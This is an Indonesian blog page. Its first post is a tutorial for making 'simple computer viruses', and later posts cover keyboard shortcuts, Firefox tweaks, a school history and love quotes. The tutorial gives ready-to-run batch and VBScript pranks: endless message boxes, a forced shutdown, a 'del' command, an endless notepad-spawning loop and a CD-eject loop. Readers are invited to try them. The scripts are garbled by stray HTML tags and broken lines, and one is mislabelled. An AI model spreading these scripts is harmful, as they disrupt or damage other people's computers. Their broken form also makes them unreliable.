Membuat Virus Komputer Sederhana

Membuat Virus Komputer Sederhana
Apa kabar semuanya..?? Semoga baik-baik saja ya, Amin..
Dah lama banget nih ga' sempet online n ga' ngeposting. Kali ini saya akan berbagi informasi tentang cara membuat virus komputer sederhana. Dibaca dan di pahami baik-baik ya :
Ini adalah cara membuat virus yang sederhana, saya rasa semua orang bisa melakukannya. Hanya dengan notepad dan kemampuan copy-paste anda sudah bisa.

1. Message yg muncul terus menerus cara nya buka notepad lalu masukan script di bawah ini :

@ECHO off
:<br />
Begin<br />
msg * Lagi ngapain ?<br />
msg * Hayo buka apa ?<br />
msg * Nanti dimarahin ama mak loe<br />
msg * Makannya jangan sembrono !<br />
msg * minta bantuan gih sono !<br />
msg * Udah instal ulang aja !!!!<br />
msg * tit............................
GOTO BEGIN</div>

bisa dirubah sesuai keinginan anda!
simpan dengan berekstensi .bat contoh fawaiqblog.bat

2.  Pertanyaan menjebak, script nya :

@echo off
title quiz hari ini 
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top

simpan dengan .bat contoh = fawaiqblog.bat

3. Membuka notepad terus-menerus, script nya :

@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top

sama simpan dengan .bat

4. Komputer mati sendiri dan ngirim message, script nya :

Set wshShell
=wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

simpan dengan .vbs

5. Buka tutup cd room terus menerus, script nya :

Set oWMP = CreateObject
("WMPlayer.OCX.7")
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

simpan dengan .vbs


Selamat mencoba, tapi jangan di gunakan untuk kejahatan dan balas dendam. Semoga artikel tentang cara membuat virus komputer sederhana bisa bermanfaat.

Sumber : cyber4rt

Related Posts:

Download Tutorial-Tutorial Microsoft Access

Download Tutorial Access

Hay semuanya, apa kabar ?
Kalau kemaren saya sudah berbagi link  untuk download tutorial-tutorial web, kali ini saya akan berbagi link untuk download tutorial-tutorial tentang access. Jika kalian saat ini sedang mencari tutorial atau artikel tentang access, beruntunglah karena disini kalian akan mendapatkannya. Ok ga' perlu banyak basa-basi, langsung saja link downloadnya bisa kalian lihat dibawah ini :

Semoga artikel diatas bermanfaat. Jangan lupa di coment n sering-sering mampir kesini ya.

Sumber :  Isacksson Chelsea Fans 

Related Posts:

Download Tutorial-Tutorial Web

Belajar Web

Apa kabar semuanya..?? Semoga baik-baik saja. Dah lama ga' ngeposting nich. Kali ini saya akan berbagi link-link untuk download tutorial-tutorial tentang web. Link-link ini saya ambil dari blog guruku.
Langsung saja silahkan di download :

      Semoga artikel ini bermanfaat ya.
      Jangan lupa di coment, dan sering-sering mampir, hehe

      Related Posts:

      Tombol Kombinasi Keyboard di Windows Part 2

      Tombol Kombinasi Keyboard Part 2
      Kali ini kita coba membahas tombol-tombol kombinasi pada keyboard. Mungkin sebagian besar teman-teman sudah familiar dengan tombol-tombol kombinasi ini. Tombol kombinasi atau lebih trend disebut dengan shortcut, dapat memudahkan kita untuk mengoperasikan Operating System jika mouse tidak berfungsi dan bahkan dapat mempercepat kerja sehingga efisiensi pun tercipta, dibandingkan dengan menggerakkan mouse dan meng-klik perintah yang kita inginkan, lebih cepat jika kita menekan tombol shortcut yang ada pada keyboard. Yang perlu kita lakukan adalah mengingat kombinasi tombol shortcut tersebut. 
      Berikut ini adalah beberapa dari kombinasi tombol shortcut nya :

      Tombol Keyboard Microsoft Yang Umum Digunakan :

      Windows Logo : Menampilkan Start menu
      Windows Logo+R : Menampilkan Run dialog box 
      Windows Logo+M : Minimize semua windows
      SHIFT+Windows Logo+M : Undo minimize semua windows
      Windows Logo+F1 : Memunculkan Windows Help and Support
      Windows Logo+E : Menjalankan Windows Explorer
      Windows Logo+F : Find files or folders atau search
      Windows Logo+D : Minimizes semua windows yang terbuka dan menampilkan desktop 
      CTRL+Windows Logo+F : Find computer pi
      CTRL+Windows Logo+TAB
       : Moves focus from Start, to the Quick Launch toolbar, to the system tray (use RIGHT ARROW or LEFT ARROW to move focus to items on the Quick Launch toolbar and the system tray)
      Windows Logo+TAB : Cycle through taskbar buttons
      Windows Logo+Break : Membuka window System Properties dialog 
      Windows Logo +L: Log off Windows

      Tombol Shortcut Keyboard Secara Umum :

      F1 : Menjalankan Windows Help
      F10 : Mengaktifkan menu bar
      SHIFT+F10 : Membuka shortcut menu untuk objek yang dipilih (sama dengan klik kanan pada objek).
      CTRL+ESC: Menampilkan Start menu (sama dengan tombol windows, gunakan tanda panah untuk memilih item atau TAB untuk berpindah antar section)
      CTRL+SHIFT+ESC: Membuka Windows Task Manager
      ALT+DOWN ARROW: Membuka drop-down list box
      ALT+TAB : Switch antar program yang berjalan (tekan dan tahan tombol ALT kemudian tekan tombol TAB untuk berpindah antar windows)
      SHIFT : tekan dan tahan tombol SHIFT ketika memasukkan CD-ROM untuk mematikan fungsi autorun.
      ALT+SPACE : Memunculkan Window's System menu (dari System menu, Anda dapat merestore, move, resize, minimize, maximize, atau menutup window)
      ALT+- (ALT+hyphen) : Memunculkan Multiple Document Interface (MDI) child window's System menu (from the MDI child window's System menu, you can restore, move, resize, minimize, maximize, or close the child window)
      CTRL+TAB : Switch antara child window of a Multiple Document Interface (MDI) program
      ALT+Huruf yang bergaris bawah pada menu: Membuka menu yang dimaksud (contoh ALT+ f membuka menu File)
      ALT+F4 : Menutup window aktif atau menutup program.
      CTRL+F4 : Menutup Multiple Document Interface (MDI) window
      ALT+F6 : Switch antara beberapa windows dalam satu program yang sama(contohnya bila beberapa file word terbuka, dengan menekan ALT+F6 file word akan berpindah dari satu file ke file lain)

      Kombinasi Antara Keyboard dan Mouse Pada Windows Explorer :

      SHIFT+right click : Membuka shortcut menu yang berisi perintah alternatif.
      SHIFT+double click : Menjalankan perintah default alternatif (urutan kedua pada menu)
      ALT+double click : Memunculkan file atau folder properties
      SHIFT+DELETE : Menghapus file tanpa melalui Recycle Bin
      SHIFT+ARROW : Memilih file atau folder secara berurutan.
      CTRL+left click : Memilih file atau folder secara acak.

      Shortcut Control Untuk Folder di Windows Explorer :

      F4 : Berpindah ke folder yang berbeda dalam box Go To (Apabila toolbar aktif di Windows Explorer)
      F5 : Refresh window aktif.
      F6 : Berpindah antar panel di Windows Explorer
      CTRL+Z : Undo perintah terakhir
      CTRL+A : memilih semjua objek pada window aktif
      BACKSPACE : Berpindah ke Folder Utama pada Folder Tree
      F2 : Rename objek
      F3 : Find all files
      CTRL+X : Cut
      CTRL+C : Copy
      CTRL+V : Paste
      ALT+ENTER : Membuka properties untuk objek yang dipilih.

      Tombol Shortcut Untuk Windows Program :

      CTRL+C : Copy
      CTRL+X : Cut
      CTRL+V : Paste
      CTRL+Z : Undo
      CTRL+B : Bold
      CTRL+U : Underline
      CTRL+I : Italic

      Windows System Key Combinations :

      F1 : Help
      CTRL+ESC : Open Start menu
      ALT+TAB : Switch between open programs
      SHIFT+DELETE : Delete item permanently
      Windows Logo+L : Lock the computer (without using CTRL+ALT+DELETE)


      Semoga artikel tentang Tombol Kombinasi Keyboard di Windows Part 2 dapat bermanfaat. Bagi yang ingin mengetahui artikel sebelum nya yaitu Tombol Kombinasi Keyboard di Windows 7 Part 1 bisa ikuti link ini

      Related Posts:

      Cara Mempercepat Mozilla Firefox

      Cara Mempercepat Mozilla Firefox
      Apa kabar semuanya? Kali ini saya akan berbagi ilmu tentang "Cara Mempercepat Mozilla Firefox". Cara ini sudah saya praktekkan sendiri dan hasilnya sangat memuaskan. Pingin tau caraya? Silahkan ikuti langkah-langkah dibawah ini :

      1. Pertama Buka Mozilla Firefox.

      2. Kemudian tulis di addres bar "about:config" (tanpa tanda petik).

      3. Klik I’ll be carefull, I Pomise!

      4. Cari "network.http.max-connections", double klik dan ganti dengan nilai "64".

      5. Cari "network.http.max-connections-per-server", double klik dan ganti dengan nilai "21".

      6.Cari 'network.http.max-persistent-connections-per-server", double klik dan ganti dengan nilai "8".

      7. Doube klik pada "network.http.pipelining " ubah menjadi "true".

      8. Cari "network.http.pipelining.maxrequests", double klik dan ganti dengan nilai "100".

      9. Double klik pada "network.http.proxy.pipelining" ubah menjadi "true".

      10. Langkah terakhir, klik kanan dimana saja pilih : New >> integrar >> kemudian tulis "nglayout.initialpaint.delay" (tanpa tanda petik"). Kemudian masukan nilai "0".

      Terakhir Tutup Mozilla kamu, kemudian buka lagi atau restart mozilla. Selesai dech…Gimana? Lebih cepat daripada yang sebelumnya apa tidak?


      Semoga ilmu yang saya bagi tentang cara mempercepat mozilla firefox bermanfaat untuk sobat.

      Related Posts:

      Sejarah SMP Negeri 1 Pati

      SMP Negeri 1 Pati
      Ok teman-teman, kali ini saya akan mosting sejarah SMP gue dulu, yaitu SMP Negeri 1 Pati. Sejarahnya seru lho, soalnya masih jaman penjajahan dulu. Ya udah langsung saja disimak baik-baik di bawah ya :

      SMP N I Pati dimulai dari Sekolah SMP Rondole Pati, resmi berdiri tahun 1943 dikenal dengan nama : Pati Syuu Dai Ichi Shoto Chu Gakko. Kepala Sekolah yang pertama adalah Bapak Oentoeng, guru yang paling senior dalam tim inti pendirian SMP. Baru beberapa bulan pak Oentoeng jadi Kepala sekolah tiba-tiba beliau sudah mengajukan pensiun. Alasannya beliau sudah sepuh dan sudah tua.

      Menurut informasi, sebenarnya beliau tidak tahan dengan tekanan dari Pemerintah Militer Jepang. Beliau tidak tahan dibentak-bentak, dihardik, dikasarin oleh tentara Jepang yang relatip masih muda dan bengis. Para tentara Jepang tidak menaruh hormat kepaa Pak Oentoeng. Sebagai pengantinya, Mathias Soegiyono yang baru berusia 28 tahun ditunjuk untuk sebagai Kepala Sekolah SMP Negeri Rondole Pati. 

      Dengan dibantu sahabatnya yaitu bapak Djacaria, ayah dari Soedarto Djacaria Realino, pengusaha kapok randu dari Pati. Bapak Djacaria meminjamkan dengan gratis, gudang kapok untuk dipakai SMP. Maka SMP Rondole Pati mulai berjalan memakai bangunan setengah jadi, terletak diatas bukit, dan dinaungi sebatang pohon kapok randu yang besar dan tinggi. Gedung setengah jadi ini terletak ditengah-tengah ladang dan sawah yang terbuka, yang panas sekali kalau siang hari dan berjarak 5 km dari kota Pati.

      Kurikulum SMP yang dibuat beliau sesuai instruksi Jepang, sebagai penjajah saat itu, memasukkan pelajaran ilmu pasti yaitu aljabar dan ilmu ukur, ilmu hayat, bahasa Indonesia, bahasa Jepang, bahasa Ingris, sejarah. Para murid juga melakukan kegiatan yang membantu jalannya perang. Didalam kurikulum ada kerja bakti disawah, diladang, memperbaiki saluran irigasi, dan membantu memanen padi yang hasilnya sebagian besar diserahkan untuk kepentingan perang Jepang. Latihan baris berbaris, latihan peperangan (kyoren), latihan merayap (hofuku) dan latihan pertempuran merupakan pengganti olah raga. Kelak kemudian hari semua itu merupakan modal para pemuda untuk menghadapi perang kemerdekaan.

      Murid-murid SMP setiap hari dipompa dengan semangat Asia Timur Raya yang dipimpin Dai Nippon, Bahasa Jepang menjadi idola dan digandrungi. Setiap tahun SMP Rondole dari Pati mengirim wakil untuk ikut Lomba Pidato dalam Bahasa Jepang di Jakarta. Latihan pidato dipimpin dan dibimbing sendiri oleh kepala sekolah sendiri (Pak Giek). Hasilnya luar biasa. Murid dari SMP Rondole Pati selalu menang. Ada kategori Tzuzuri Kata dan Hanashi Kata. Sehingga tahun 1944-1945 Pati Da Ichi Shoto Chu Gakko dan Pak Giek selaku Kepala SMP menjadi terkenal di Jawa dan Madura.

      Suasana SMP Rondole Pati ditahun 1944. Setiap pagi anak-anak murid SMP Rondole Pati pergi kesekolah dengan naik sepeda yang ban rodanya dari karet mati, sebagian besar berjalan kaki menyusuri galengan sawah dan jalan setapak. Didepan Keibodan, yang naik sepeda harus turun, sepeda dituntun pelan-pelan, kalau berani menaiki sepeda si murid akan ditampar oleh tentara Jepang. Kinrohosi merupakan tugas wajib bagi murid laki-laki dan perempuan, program yang digalakkan pada waktu itu adalah menanam jarak. Buah jarak ini akan diambil minyaknya dan dikumpulkan disuatu gudang, selanjutnya orang Jepang akan mengangkut minyak jarak ketempat yang dirahasiakan.

      Pada saat ada liburan sebulan, semua murid laki-laki dan semua guru laki-laki, mulai kepala sekolah dan semua guru lainnya, yang masih muda-muda diwajibkan menjalani kegiatan training PETA (Pembela Tanah Air). Mereka dipinjami pakaian hijau yang berlengan panjang dan bercelana pendek, dipinjami senjata laras panjang dan topi baja yang besar dan berat. Selama latihan satu bulan semua peserta PETA tidur dibarak tentara, didipan kayu beralas tikar pandan bantalnya terbuat dari kapuk yang tipis.

      Setiap hari terumpet ditiup sebagai tanda bangun pagi, disambung olahraga dan kakeysu atau lari-lari pagi. Istirahat hanya sekejap disambung dengan memeriksa laras bedhil yang panjang. Kalau dalam pemeriksaan terdapat pasir, si murid akan digampar oleh pelatih. Mandi hanya sebentar ramai-ramai, diteruskan makan pagi dengan menu tahu dan tempe. Lalu semua murid dan guru masuk ruang kelas. Mata pelajaran yang diajarkan teori perang, teori mengadapi musuh, berkelahi dengan musuh, pertahanan dll dll. Disambung praktek dilapangan, biasanya dibukit yang tandus. Ada merayap 1,2,3,4 (dai ichi, dai ni, dai sam, dai yon hoofuku). Lelahnya bukan main dan tenggorokan kering sekali karena kehausan. Karena tidak disediakan air minum, para peserta training PETA minum air dari parit yang ada disitu, airnya jernih carana mengambil airnya dengan memakai topi/boshi. Herannya tidak ada yang sakit perut. Siang pulang ke barak untuk makan dan istirahat. Jam 1500 kumpul lagi untuk latihan nyanyi-nyanyi  dipimpin Chudanco dibantu Shodanco atau Bundanco. Sore baru boleh mandi, istirahat dan makan malam yang sederhana. Malam ada pelajaran teori tentang senjata. Setiap malam jam 22.00 ada apel malam, baru boleh tidur.

      Jepang menyerah kepada Sekutu tanggal 14 Agustus 1945. Bala tentara Jepang di Pati kehilangan semangat. Mereka tidak bernafsu untuk merintangi pemuda-pemuda Pati yang sedang terbakar semangatnya mengumumkan kemerdekaan. Para pemuda di Pati sudah tahu bahwa Soekarno-Hatta telah memproklamasikan Kemerdekaan Indonesia pada tanggal 17 Agustus 1945 di Jakarta. Dengan bambu runcing dipundak, para pemuda dan rakyat di Pati keluar kejalanan menyambut kemerdekaan.

      Tentara Jepang di Pati berusaha menyelamatkan diri dari dendam rakyat di Pati dengan jalan mengurung diri didalam asrama. Mereka baru membela diri apabila diserang oleh pemuda-pemuda dari Pati yang berusaha merampas senjata mereka. Usaha merampas senjata yang pada mulanya hanya bersifat perorangan kemudian meningkat menjadi gerakan massa yang lebih teratur. Polisi-polisi Pati dibantu murid-murid SMP Rondole Pati dan guru-gurunya, yang pernah dilatih PETA oleh Jepang, berperan sangat aktif untuk melucuti kesatuan tentara Jepang dan mengambil senjata, perlengkapan dan alat-alat militer lainnya. Aksi melucuti dan merebut senjata Jepang di Pati boleh dikatakan sukses.

      Pejuang SMP Rondole Pengalaman dilatih Jepang di PETA berguna pada waktu perang kemerdekaan ditahun 1945-1950. Para murid dan guru SMP Rondole Pati bergabung di BKR (Badan Keamanan Rakyat). Ayah saya juga ikut bergabung di BKR memanggul senjata dan ikut berperang membela kemerdekaan di Palagan Semarang, Pucakwangi, dan Surakarta.

      Murid-murid dan semua guru SMP Rondole Pati sangat aktif membela kemerdekaan dan selalu meminta ditempatkan di front terdepan. Umur rata-rata para murid masih belasan tahun, umur para guru rata-rata masih kepala 2, pangkat yang diberikan bermacam-macam. Karena sudah pernah dilatih PETA, maka dianggap sudah terdidik, tidak ada yang sebagai prajurit biasa saja. Pangkatnya mulai sersan, sersan mayor, letnan paling tinggi kapten. Beberapa diantara murid meninggal terkena peluru yang ditembakkan tentara Belanda dan tentara Gurka. Kisah-kisah heroik ditulis oleh para alumni SMP Rondole Pati dan dikumpulkan didalam buku saku kecil yang dibagikan setiap ada pertemuan reuni SMP Rondole.

      Murid-murid putri SMP Rondole Pati turut berjuang membela kemerdekaan dan umumnya mereka bekerja dikesehatan bergabung dengan Palang Merah Indonesia, sebagian murid putri ditempatkan di dapur umum. Mereka menyatu dan berhubungan erat sehingga mempertebal rasa persaudaraan diantara pejuang-pejuang muda murid SMP Rondole Pati.

      Pertempuran lima hari di Semarang, dimana murid dan guru SMP Rondole Pati ikut berperang untuk mempertahankan kemerdekaan, berdampak positip sekali. Ikatan murid dan guru bertambah erat. Ketika itu ada sekitar 400 orang-orang veteran AL Jepang yang pernah bertempur di Solomon, Pasifik akan dipekerjakan untuk mengubah pabrik gula Cepiring (30 km sebelah Barat Semarang) menjadi pabrik senjata. Begitu masuk kota Semarang, tawanan Jepang ini memberontak, bahkan menyerang tentara Indonesia dan polisi Indonesia yang bertugas mengawal mereka. Orang-orang Jepang ini melarikan diri dan bergabung dengan Kidobutai Jatingaleh Semarang, yaitu batalyon Jepang setempat. Mereka bergerak dengan dalih mencari orang-orang Jepang yang tertawan. Ada desas-desus bahwa cadangan air di Candi diracuni. 

      Pertempuran mulai pecah dinihari 15 Oktober 1945. Ratusan tentara Jepang Kidobutai dan ditambah ratusan batalyon Jepang yang sedang singgah di Semarang, dengan bersenjata lengkap, bertempur melawan ribuan orang Semarang, gabungan pemuda, TKR dan BKR Semarang yang amat minim persenjataannya. Sebagian dari kisah heroik rakyat Semarang, sesudah sholat subuh saudara-saudara muslim keluar dari masjid Agung Semarang bersenjatakan keris, tumbak, bambu runcing, pentungan dibawa bertempur, sebagian besar dari mereka gugur diterjang peluru Jepang.

      Pertempuran paling seru terjadi di Simpang Lima, ribuan orang Semarang bertempur, termasuk puluhan murid-murid dan guru SMP Rondole yang datang dari Pati ikut berperang. Tidak ada rasa takut, karena murid dan guru SMP Rondole sedang dibakar dengan semangat mempertahankan kemerdekaan. Setelah lima hari bertempur lalu cease fire. Korbannya luar biasa banyaknya, ada kira-kira 2000-an rakyat Semarang gugur dan ada 200 tentara Jepang yang tewas. Murid putri dari SMP Rondole Pati ikut perang, mereka bergabung dengan Palang Merah Indonesia. Mereka menjalankan tugasnya digaris depan memberi pertolongan kepada korban-korban pertempuran. Berkat PMI banyak korban yang dapat diselamatkan dan sebagian dari mereka dapat kembali ke medan pertempuran.

      Awal tahun 1947 SMP Rondole resmi dipindahkan dari desa Rondole ke kota Pati. Menempati gedung bekas pabrik rokok yang dimiliki oleh seorang pengusaha Tionghoa. Pak Giek dengan didukung oleh pejabat Pati waktu itu, yaitu bapak Bupati, Ketua DPRD, dan pejabat Muspida Pati berusaha mati-matian agar gedung eks pabrik rokok yang kosong itu bisa dipakai unutk tempat belajar anak-anak. Namanya diganti dari SMP Rondole menjadi SMP Negeri Pati. Pak Giek dipercaya untuk menjadi Kepala Sekolah SMP Negeri Pati yang pertama. Perjuangan Pak Giek dengan dibantu guru-guru SMP Negeri Pati antara lain bapak Sumadi, bapak Salyo, bapak Peket, bapak Sudjono, ibu Sutji sungguh tak ternilai, dengan gigih beliau-beliau berjuang agar gedung bisa dipakai secara permanen. Kurikulum SMP Negeri Pati pun diperbaharui, pelajaran di kelas lebih diutamakan. SMP Negeri Pati menjadi sangat populer murid-murid berdatangan dari Pati dan sekitarnya seperti Kudus, Juwana dan Rembang.

      Murid-murid dari Djuwana dan Rembang setiap pagi berangkat sekolah naik kereta api uap. Mereka bangun tidur jam 4 pagi untuk bisa naik kereta api jam 5. Ketika kereta melewati gedung sekolah SMP Negeri 1 Pati, sebagian dari murid laki-laki berani meloncat turun dari kereta yang sedang berjalan. Murid-murid perempuan turun di halte alun-alun, lalu berjalan kaki kesekolah. Murid lain ada yang naik sepeda dengan ban sepeda biasa dan lebih banyak yang berjalan kaki.

      (di sarikan dari gsumariyonos Weblog)
      matur nuwun pak sumaryono, ngapunten menawi salah mensari cerita penjenengan.


      Kalau pingin tau lebih dalam lagi tentang SMP Negeri 1 Pati bisa datang langsung ke sekolah, ni saya kasih alamatnya : Jl. Pemuda No. 287 Telp. (0295) 381517 Pati 59115. Bisa juga ditanyain ke Mbah Google. Hehe
      Semoga artikel tentang sejarah SMP Negeri 1 Pati diatas bermanfaat.

      Related Posts:

      Tombol Kombinasi Keyboard di Windows 7 Part 1

      Pa kabar sobat, semoga baik-baik saja. Ok kali ini saya akan berbagi ilmu tentang tombol-tombol kombinasi keyboard pada Windows 7. Ya biar lebih terampil dan lebih cepat dalam ngetik ataupun nyelesaiin pekerjaan sob. Ok langsung saja simak dibawah ini ya :


      [Windows] + [Spacebar]
      Anda akan melihat dekstop dan membuat semua menjadi transparan. Hal ini akan sama jika kursor mouse ada di pojok kanan bawah layar

      [Windows] + [D]
      Menuju Desktop tanpa banyak basa basi, tekan 2x maka akan kembali ke worksheet awal sebelum ke desktop

      [Windows] + [Home]
      Minimize semua kecuali windows yang kita select

      [Windows] + Arah Kiri / Arah Kanan
      Fungsinya seperti rata kanan atau rata kiri jendela aktif

      [Windows] + Arah atas atau [Windows] + arah bawah
      Maximize atau minimize

      [Windows] + [Tab]
      Ini yang paling asik, membuat worksheet menjadi 3D


      Trik Keyboard di Windows 7

      [Alt] + [Ctrl] + [Tag] + Tombol kiri/kanan/atas/bawah
      Flip window, bisa bikin temen stress nih

      [Alt] + [Tab]
      Biasa sih ini mah

      [Windows] + [T] atau [Windows] + [SHIFT] + [T]
      Efek ini sama seperti ketika arahkan mouse pada taskbar aktif yang ada di samping tombol windows

      [Windows] + [ B ]
      Memfokus tombol “show hidden icons” di system tray

      [Windows] + [1] hingga [9] atau [Windows] + [SHIFT] + [1] hingga [9]
      Sama seperti mengklik icon yang ada di taskbar (samping tombol windows) urutannya 1,2,3,4…..9

      [Windows] + [Ctrl] + [1] hingga [9]
      Membuka program yang ada di taskbar dengan waktu yang sama.

      [Windows] + [Alt] + [1] hingga [9]
      Sama seperti kita klik kanan di icon taskbar 

      Multiple Monitors

      [Windows] + [P]
      Mode Screen, biasanya berguna untuk presentasi menggunakan projector

      Magnifier

      [Windows] + [+] atau [Windows] + [-]
      Mengaktifkan menu magnifier untuk men-zoom windows

      [Ctrl] + [Alt] + [D]
      Memperbesar dengan mode dock

      [Ctrl] + [Alt] + [L]
      Memperbesar seperti mode loop

       
      [Ctrl] + [Alt] + [F]
      Full Screen Mode on sob

      [Ctrl] + [Alt] + [i]
      Invert colors

      [Windows] + [Esc]
      Keluar

      [Windows] + [G]
      Melihat gadget

      [Windows] + [X]
      Menjalankan Windows Mobility Center


      Semoga tutorial Tombol Kombinasi Keyboard di Windows 7 Part 1 ini bermanfaat. Untuk mengetahui tutorial lanjutan tentang Tombol Kombinasi Keyboard Part 2 silakan ikuti link ini

      Related Posts:

      Kata-Kata Mutiara Kehidupan Remaja


      "Semua kata adalah sama", kata itulah yang selama ini orang-orang yakini, tapi dalam adab hidup manusia, kata kata menjadi jembatan untuk manusia bersosialisasi dengan manusia lainnya. Nah pada update-an kali ini saya  hadir lagi untuk kembali menyajikan kata-kata mutiara kehidupan remaja, langsung saja disimak baik-baik ya :

      1. Ketika seseorang menunggumu, tak berarti dia tak ada hal lain tuk dilakukan, itu hanya berarti tak ada yang penting selain dirimu.
      2. Jangan sesali satu haripun dalam hidupmu. Kenanglah hari baik yang telah memberimu kebahagiaan, dan hari buruk yang telah memberimu pengalaman.
      3. Kamu mungkin tak cukup baik tuk semua orang, tapi percayalah, kamu akan selalu menjadi yang terbaik tuk orang yang pantas untukmu.
      4. Terkadang kamu memaafkan seseorang, bukan karena kamu lemah, tapi karena kamu menyadari semua orang bisa melakukan salah.
      5. Lupakan dia yang pernah meninggalkanmu demi orang lain. Meski cinta, jangan biarkan dirimu kembali terluka tuk alasan yg sama.
      6. Dalam cinta, lebih baik percaya pada apa yang kamu lihat dan apa yang kamu rasa daripada apa yang orang lain katakan.
      7. Bahagia bukan berarti memiliki segalanya. Bahagia berarti tidak membandingkan milik kita dengan milik orang lain.
      8. Jangan sesali sesuatu yang telah berakhir, meskipun itu indah. Tanpa akhir tak akan pernah ada awal baru yang mungkin lebih indah.
      9. Hidup ini sulit, apa yang kamu inginkan tak akan selalu kamu dapatkan, namun jangan pernah menyerah. Berusaha dan terus berdoa.
      10. Tegas akan diri sendiri, buang pikiran negatif dan lakukan yang baik. Kegelisahan hanya milik mereka yang putus asa.
      11. Jalani kehidupan dengan penuh kesungguhan, hadapi kenyataan dengan penuh kesabaran. Maka yang akan kita dapat adalah kebahagiaan.
      12. Tuk setiap kebaikan, akan selalu ada mata yg melihatnya. Tuk setiap cinta, akan selalu ada hati yang tulus mencintainya.
      13. Tak ada yang salah jika kamu tak menyukai seseorang, yang salah adalah mengusik hidupnya hanya karena kamu tak menyukainya.
      14. Dalam cinta, lebih baik menunggu orang yang tepat daripada menghabiskan waktu dengan orang yang salah.
      15. BERDOA, bukan karena kamu membutuhkan sesuatu, tapi karena kamu harus bersyukur atas apa yg telah Allah SWT berikan dalam hidupmu.
      16. Tak peduli apa yg terjadi dalam hidupmu, baik ataupun buruk, percayalah itu semua dari dari Sang Pencipta tuk kebaikan dirimu.
      17. Seorang pria yang tak tahu bagaimana menghargai seorang wanita adalah pria yang tak tahu bagaimana menghargai ibunya.
      18. Dalam cinta, terkadang kamu harus menyerah, karena itu lebih baik ketika 2 hati memang tak lagi berusaha tuk tetap bersama.
      19. Persahabatan bukan untuk mengumpulkan batu sebanyak-banyaknya, melainkan untuk menemukan satu emas yang berharga.
      20. Jika kau mencintai seseorang, kau tidak akan berbohong kepadanya. Jika berbohong, maka cintamu tidak lebih besar dari kebohonganmu.
      21. Cemburu berarti kamu takut kehilangannya, tapi cemburu yang berlebih akan membuat kamu kehilangannya.
      22. Allah SWT memang janjikan yang terbaik untukmu, tapi tak berarti segalanya akan mudah. Yang penting jangan menyerah dan teruslah berusaha.
      23. Menyakitkan ketika bertemu seseorang yang kamu yakin orang yang tepat untukmu, hanya tuk menyadari kamu bukan orang yg tepat untuknya.
      24. Patah hati adalah salah satu cara tuk menemukan cinta sejati.
      25. Berhati-hatilah dalam berkata, karena sebuah kata MAAF tak selalu menyembuhkan luka yg ada.
      26. Kadang menangis buatmu merasa lebih baik. Karena menangis, hati mampu mengekspresikan diri, yang tak bisa diungkapkan oleh kata.
      27. Hal besar dimulai dari yang terkecil. Jujurlah untuk hal kecil dalam hidupmu, & Allah SWT akan mempercayakan hal besar padamu.
      28. Cinta memang butuh 2 hati yang saling percaya, yang meski tak pernah mudah tapi akan bertahan selamanya jika keduanya: SETIA.
      29. Tak perlu menangisi sebuah perpisahan. Karena itu, berarti kamu bisa memulai sesuatu yang baru. Sesuatu yg lebih baik!
      30. Jangan menilai sesuatu dari apa yang kamu lihat saja. Banyak yang tak kamu lihat, dan itu yang sebenarnya berarti.
      31. Kadang tak peduli betapa seseorang telah menyakitimu, kamu selalu memaafkannya. Meski kedengaran BODOH, tapi bagimu itu CINTA.
      32. Jangan remehkan kekuatan senyuman, karena ia mampu membuat orang lain tersenyum juga. Ayo, berikan #senyummu pada seseorang hari ini!
      33. Jangan berpikir kamu tak mampu melupakan masa lalu. Tutup pintu masa lalumu, karena Sang Maha Kuasa selalu membuka pintu masa depanmu.
      34. Jangan biarkan amarah menguasaimu, karena akan merugikan dirimu sendiri. Bersabarlah, selalu ada kebaikan dalam diri manusia.
      35. Jangan pernah menyerah, kamu lebih berani daripada yang kamu percaya dan lebih kuat daripada yang kamu pikirkan. Semangat!
      36. Menjauhlah dari orang-orang yang salah, karena mereka pasti membawamu ke tempat yang salah. Bijaklah dalam memilih teman.
      37. Ketika kamu sadar betapa berartinya dirimu, kamu tak akan pernah biarkan seorangpun masuk ke hidupmu hanya tuk buatmu terluka.
      38. Dalam cinta, jika seseorang tak mau belajar tuk mencintaimu apa adanya, kamu harus belajar tuk meninggalkannya.
      39. Yang istimewa bukanlah memiliki segalanya di dunia, tapi memiliki seseorang yang menilaimu lebih dari segalanya di dunia.
      40. Seberapa dalam seseorang dapat melukaimu tergantung dari seberapa berartinya orang tersebut untukmu.
      41. Jangan takut mencinta hanya karena pernah terluka, tak ada pelangi tanpa hujan, tak ada cinta sejati tanpa tangisan.
      42. Ladies, #Faktanya Lelaki yang mengabaikanmu, itu artinya dia menolakmu dengan cara yang halus. Ia tak ingin menyakitimu.
      43. Ladies, #Faktanya Lelaki yang mencintai tak akan pernah berbuat kasar meskipun ia marah. Ia tak ingin menyakiti, ia tak ingin kamu pergi.
      44. Jangan berjanji tuk tak saling menyakiti, karena akan teringkari. Berjanjilah tuk tetap bersama, meski kadang ada luka.
      45. Jangan terlalu berharap jika kamu tak ingin terluka. Jangan berikan segalanya jika dia memang tak ingin bersamamu selamanya.
      46. Ketika kamu terluka, jangan biarkan dirimu menyerah. Tak perlu takut dengan sakit yang ada, karena itu semua demi CINTA.
      47. Jangan pernah mengabaikan dia yang peduli padamu, hanya karena kamu ingin dapatkan perhatian orang lain yang tak peduli padamu.
      48. Kadang kamu harus menjauh dari seseorang. Jika dia peduli, dia akan menyadari. Jika tidak, kamu tahu bagaimana menjalani hari.
      49. Ketika kamu terluka karena kesalahanmu sendiri, tak ada yang mampu menyembuhkannya kecuali kamu memaafkan diri sendiri.
      50. Cintai dengan tulus, mungkin membuatmu terluka, tapi membuatmu kian dewasa. Mema’afkan memberi hati pelajaran tentang KETULUSAN.
